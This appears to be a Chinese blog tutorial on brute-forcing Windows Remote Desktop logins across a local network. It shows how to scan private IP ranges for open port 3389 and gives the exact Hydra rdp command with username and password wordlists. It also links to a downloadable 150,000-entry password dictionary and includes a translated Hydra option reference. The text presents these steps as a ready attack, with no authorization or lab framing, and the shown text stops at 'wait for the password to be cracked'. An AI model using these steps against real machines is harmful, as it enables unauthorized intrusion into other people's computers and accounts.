【末世旅行之渗透测试】局域网内字典破解3389远程桌面

过程：通过扫描局域网内私有IP已开启远程桌面的计算机，利用Hydra进行字典密码尝试

工具：IP端口扫描工具，字典，Kali Linux

1.扫描私有IP的3389端口(软件下载地址：http://download.csdn.net/download/q1425603211/10009428)

私有IP范围：

A类：10.0.0.0-10.255.255.255

B类：172.16.0.0-172.31.255.255

C类：192.168.0.0-192.168.255.255



2.对已开启远程桌面的IP进行字典破解

使用Kali Linux中的Hydra (官网下载链接：https://www.kali.org/downloads/ ，在虚拟机运行的话，可直接下载虚拟机版)

hydra 10.0.0.1 rdp -L /root/Documents/username.txt -P /root/Documents/3.txt

即：hydra IP rdp -L 用户名文件 -P 密码文件

15万字典文件下载：http://download.csdn.net/download/q1425603211/10009437

Windows版的Hydra下载：http://download.csdn.net/download/q1425603211/10014543



笔记：hydra -h 参数说明

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

-R 继续从上一次进度接着破解。

-S 采用SSL链接。

-s PORT 可通过这个参数指定非默认端口。

-l LOGIN 指定破解的用户，对特定用户破解。

-L FILE 指定用户名字典。

-p PASS 小写，指定密码破解，少用，一般是采用密码字典。

-P FILE 大写，指定密码字典。

-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。

-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。

-M FILE 指定目标列表文件一行一条。

-o FILE 指定结果输出文件。

-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。

-t TASKS 同时运行的线程数，默认为16。

-w TIME 设置最大超时的时间，单位秒，默认是30s。

-v / -V 显示详细过程。

server 目标ip

service 指定服务名，支持的服务和协议：asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs
pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp（windows远程桌面使用rdp）

3.等待破解出密码：